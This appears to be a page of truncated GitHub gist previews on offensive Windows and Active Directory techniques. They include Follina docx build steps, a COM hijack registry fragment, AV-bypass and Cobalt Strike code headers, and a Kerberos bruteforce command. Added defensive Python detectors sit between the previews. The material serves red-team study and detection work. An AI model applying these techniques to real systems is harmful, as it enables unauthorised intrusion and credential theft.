
@tothi
tothi / ms-msdt.MD
Last active April 18, 2024 02:22
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
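The defensive check a practitioner wants alongside this: a scanner that opens a docx as the OOXML zip it is and lists every OLE relationship whose target lies outside the package, which is the hook this technique relies on. This is an added example, not code from the gist above; the package layout it builds is a constructed minimal sample (not a real Word file) and the relationship type URI is the standard OOXML oleObject type.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship type Word uses for OLE objects, and the package relationships namespace.
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def find_external_ole(docx_bytes):
    """Return (rels_part, rId, target) for every OLE relationship whose target is outside the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter("{%s}Relationship" % PKG_REL_NS):
                if rel.get("Type") == OLE_REL_TYPE and rel.get("TargetMode") == "External":
                    findings.append((part, rel.get("Id"), rel.get("Target")))
    return findings


def build_sample_docx(external_target=None):
    """Constructed minimal package (not a real Word file): one embedded OLE object, plus an
    external one when external_target is given. Just enough structure for the scanner above."""
    rels = ['<Relationship Id="rId1" Type="%s" Target="embeddings/oleObject1.bin"/>' % OLE_REL_TYPE]
    if external_target is not None:
        rels.append('<Relationship Id="rId2" Type="%s" Target="%s" TargetMode="External"/>'
                    % (OLE_REL_TYPE, external_target))
    rels_xml = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                '<Relationships xmlns="%s">%s</Relationships>' % (PKG_REL_NS, "".join(rels)))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels_xml)
        z.writestr("word/embeddings/oleObject1.bin", b"\x00")
    return buf.getvalue()


if __name__ == "__main__":
    for part, rid, target in find_external_ole(build_sample_docx("http://example.invalid/payload.html")):
        print("%s: %s -> external OLE target %s" % (part, rid, target))
```

An embedded OLE object has a relative Target and no TargetMode, so it is silent here; only a relationship that makes Word fetch something from outside the file is reported, which is the case to inspect regardless of what scheme the fetched HTML later invokes.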
@0xsha
0xsha / CVE-2021-44142.py
Last active October 3, 2023 13:34
CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write
# CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write
# (C) 2022 - 0xSha.io - @0xSha
# This PoC is un-weaponized and for educational purposes only.
# To learn how to use the PoC please read the writeup :
# https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142
# requires samba4-python
# References :
# https://www.thezdi.com/blog/2022/2/1/cve-2021-44142-details-on-a-samba-code-execution-bug-demonstrated-at-pwn2own-austin
# Patch : https://attachments.samba.org/attachment.cgi?id=17092
@bohops
bohops / AccCheckConsole.txt
Last active February 28, 2024 19:15
AccChecker LOLBIN [AccCheckConsole.exe]
*Purpose
- UI Accessibility Checker
- Verifies UI accessibility requirements
*LOLBIN Functionality/Steps
1) Go to "Custom Verification Routines" link in reference section and copy the sample verification C# code into Visual Studio.
2) Add proper assembly references (e.g. AccCheck.dll)
3) Insert your C# code under a target method such as Execute()
4) Compile to a .NET managed library (DLL)
5) Invoke the code
@theevilbit
theevilbit / divide_and_conquer.c
Created January 17, 2021 15:11
Divide and Conquer NextGen AV bypass
/*
This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes.
*/
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#include "Commctrl.h"
#include <string>
@G0ldenGunSec
G0ldenGunSec / EnumCLR.c
Last active February 23, 2024 10:37
Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.
#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include "beacon.h"
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD);
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD);
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\Scripting.FileSystemObject]
@=""
[HKEY_CURRENT_USER\Software\Classes\Scripting.FileSystemObject\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
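Why this fragment matters: for non-elevated processes the per-user hive HKCU\Software\Classes is merged into HKEY_CLASSES_ROOT ahead of HKLM\Software\Classes, so a ProgID whose CLSID subkey is redefined there resolves to the attacker's class for every consumer that looks it up by name. The following is an added example, not the gist author's code: a small parser for the string-value subset of .reg syntax and a check that flags per-user ProgID redirects and per-user server registrations. The sample .reg text is the fragment above plus a constructed benign file-extension key.

```python
import re

USER_CLASSES = "HKEY_CURRENT_USER\\Software\\Classes\\"
GUID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")
VALUE_RE = re.compile(r'^(@|"[^"]*")=(.*)$')
# Subkeys under CLSID\{guid} that decide which code is loaded for the class.
SERVER_KEYS = {"INPROCSERVER32", "LOCALSERVER32", "TREATAS"}


def parse_reg(text):
    """Parse the .reg subset used for string values: [key] headers, then @="..." or "name"="..." lines."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, data = m.group(1), m.group(2)
            if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
                data = data[1:-1]
            keys[current][name.strip('"')] = data
    return keys


def find_user_com_hijacks(text):
    """Flag per-user COM registrations that shadow the machine-wide ones for non-elevated processes."""
    findings = []
    for key, values in parse_reg(text).items():
        if not key.upper().startswith(USER_CLASSES.upper()):
            continue
        parts = key[len(USER_CLASSES):].split("\\")
        default = values.get("@", "")
        # <ProgID>\CLSID with a GUID default: lookups of that ProgID now resolve to this class.
        if len(parts) == 2 and parts[1].upper() == "CLSID" and GUID_RE.match(default):
            findings.append(("progid_redirect", parts[0], default))
        # CLSID\{guid}\InprocServer32 etc.: the class itself now points at a user-controlled server.
        if len(parts) == 3 and parts[0].upper() == "CLSID" and parts[2].upper() in SERVER_KEYS:
            findings.append(("server_override", parts[1], default))
    return findings


# Constructed sample: the fragment above plus a harmless per-user file-association key.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\.txt]
@="txtfile"

[HKEY_CURRENT_USER\Software\Classes\Scripting.FileSystemObject]
@=""

[HKEY_CURRENT_USER\Software\Classes\Scripting.FileSystemObject\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
'''

if __name__ == "__main__":
    for kind, name, value in find_user_com_hijacks(SAMPLE_REG):
        print("%s: %s -> %s" % (kind, name, value))
```

The .txt association is ignored because it neither redirects a ProgID to a CLSID nor registers a server; the Scripting.FileSystemObject redirect is reported with the CLSID it now points to, which is the value to pivot on when checking what InprocServer32 or TreatAs that CLSID carries.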
@mattifestation
mattifestation / rundll_exports.csv
Created October 18, 2019 13:48
All System32 DLL export functions that contain "RunDLL", an indicator that it's designed to run with rundll32.exe
Module Function
C:\Windows\System32\advpack.dll DelNodeRunDLL32W
C:\Windows\System32\advpack.dll DelNodeRunDLL32A
C:\Windows\System32\advpack.dll DelNodeRunDLL32
C:\Windows\System32\ConnectedAccountState.dll ActionCenterRunDllW
C:\Windows\System32\cryptcatsvc.dll CatDbOfflineRebuildDatabasesRundll32W
C:\Windows\System32\cscui.dll CSCOptions_RunDLLW
C:\Windows\System32\cscui.dll CSCOptions_RunDLLA
C:\Windows\System32\cscui.dll CSCOptions_RunDLL
C:\Windows\System32\devmgr.dll DeviceProblenWizard_RunDLLW
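How a detection engineer would use such a list: parse rundll32 command lines from process-creation telemetry into (DLL, export) pairs and grade each one. A pair in the list is a known rundll32 entry point; an export whose name contains "RunDLL" but is not in the list was at least built for rundll32 and mostly needs the DLL path checked; anything else is where rundll32 abuse (arbitrary DLLs, the javascript: trick) tends to land. This is an added example, not the gist's code; the allowlist is built only from the rows visible in the preview above, so it is a subset, and the command lines are constructed samples.

```python
import ntpath
import re

# Rows copied from the preview above (module, export); a real deployment would load the full CSV.
KNOWN_RUNDLL_EXPORTS_CSV = r"""Module Function
C:\Windows\System32\advpack.dll DelNodeRunDLL32W
C:\Windows\System32\advpack.dll DelNodeRunDLL32A
C:\Windows\System32\advpack.dll DelNodeRunDLL32
C:\Windows\System32\ConnectedAccountState.dll ActionCenterRunDllW
C:\Windows\System32\cryptcatsvc.dll CatDbOfflineRebuildDatabasesRundll32W
C:\Windows\System32\cscui.dll CSCOptions_RunDLLW
C:\Windows\System32\cscui.dll CSCOptions_RunDLLA
C:\Windows\System32\cscui.dll CSCOptions_RunDLL
C:\Windows\System32\devmgr.dll DeviceProblenWizard_RunDLLW
"""

# Matches "rundll32", "rundll32.exe", or a full path to it, optionally quoted.
RUNDLL32_RE = re.compile(r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+(.*)$', re.IGNORECASE)


def load_exports(csv_text):
    """Build {(dll basename lowercased, export)} from the whitespace-separated 'Module Function' rows."""
    known = set()
    for line in csv_text.splitlines()[1:]:
        if not line.strip():
            continue
        module, func = line.rsplit(None, 1)
        known.add((ntpath.basename(module).lower(), func))
    return known


def parse_rundll32(cmdline):
    """Return (dll, export) from a rundll32 command line, or None if it is not one or has no entry point."""
    m = RUNDLL32_RE.match(cmdline)
    if not m:
        return None
    rest = m.group(1).strip()
    comma = rest.find(",")
    if comma < 0:
        return None
    dll = rest[:comma].strip().strip('"')
    export = re.match(r'[^\s"]*', rest[comma + 1:].lstrip()).group(0)
    return dll, export


def classify(cmdline, known):
    parsed = parse_rundll32(cmdline)
    if parsed is None:
        return "not_rundll32_or_no_entry"
    dll, export = parsed
    if (ntpath.basename(dll).lower(), export) in known:
        return "known_export"
    if "rundll" in export.lower():
        return "rundll_named"   # built for rundll32 but not in the list: check the DLL path
    return "review"             # export not named for rundll32: most abuse lands here


# Constructed sample command lines, not real telemetry.
SAMPLE_CMDLINES = [
    r'rundll32.exe C:\Windows\System32\advpack.dll,DelNodeRunDLL32 "C:\Temp\old"',
    r'"C:\Windows\System32\rundll32.exe" shell32.dll,ShellExec_RunDLL calc.exe',
    r'rundll32.exe C:\Users\Public\update.dll,Start',
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert(1)',
    r'rundll32.exe C:\Users\Public\x.dll',
]

if __name__ == "__main__":
    known = load_exports(KNOWN_RUNDLL_EXPORTS_CSV)
    for line in SAMPLE_CMDLINES:
        print("%-26s %s" % (classify(line, known), line))
```

The grading is a heuristic, not a verdict: plenty of legitimate rundll32 entry points do not carry "RunDLL" in their name, so "review" means look at the DLL path, signer and parent process, not alert on its own.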
@itsreallynick
itsreallynick / gen_URLpersistence.yar
Last active March 10, 2020 12:47
Yara rules for .url tricks that didn't fit in a tweet
rule Methodology_Suspicious_Shortcut_Local_URL
{
meta:
author = "@itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)"
description = "Detects local script usage for .URL persistence"
reference = "https://twitter.com/cglyer/status/1176184798248919044"
strings:
$file = "URL=file:///" nocase
$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
$url_explicit = "[InternetShortcut]" nocase
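The same logic as a host-side check over the .url file itself, added here as an example that is not part of the gist: parse the INI-style sections, report which of the rule's three strings are present, and decide on the file:/// target, since the rule's condition is cut off in the preview and its name says the local URL is the point. The two sample files are constructed.

```python
# Section name the rule looks for; the GUID is copied from the $url_clsid string above.
URL_CLSID_SECTION = "{000214A0-0000-0000-C000-000000000046}"


def parse_url_file(text):
    """Parse .url (INI) text into {section.lower(): {key.lower(): value}}."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            name, _, value = line.partition("=")
            sections[current][name.strip().lower()] = value.strip()
    return sections


def url_indicators(text):
    """Return the rule's string names ($url_explicit, $file, $url_clsid) found in the file, in that order."""
    sections = parse_url_file(text)
    hits = []
    if "internetshortcut" in sections:
        hits.append("url_explicit")
    # The rule matches URL=file:/// anywhere, so check a URL key in any section, case-insensitively.
    if any(v.get("url", "").lower().startswith("file:///") for v in sections.values()):
        hits.append("file")
    if URL_CLSID_SECTION.lower() in sections:
        hits.append("url_clsid")
    return hits


def is_local_url_persistence(text):
    """A shortcut whose target is a local file path is the case the rule is named for."""
    return "file" in url_indicators(text)


# Constructed samples: an ordinary web shortcut and one pointing at a local script.
BENIGN_URL = "[InternetShortcut]\r\nURL=https://example.invalid/\r\n"
LOCAL_URL = ("[InternetShortcut]\r\nURL=file:///C:/Users/Public/run.vbs\r\n"
             "[" + URL_CLSID_SECTION + "]\r\nProp3=19,2\r\n")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_URL), ("local", LOCAL_URL)):
        print(name, url_indicators(sample), is_local_url_persistence(sample))
```

When deploying this over a Startup folder sweep, pair the file:/// check with the target's extension and location: a shortcut to a script under a user-writable path is the combination that the rule's reference tweet describes.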
@Arno0x
Arno0x / TestAssembly.cs
Last active May 19, 2024 11:37
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: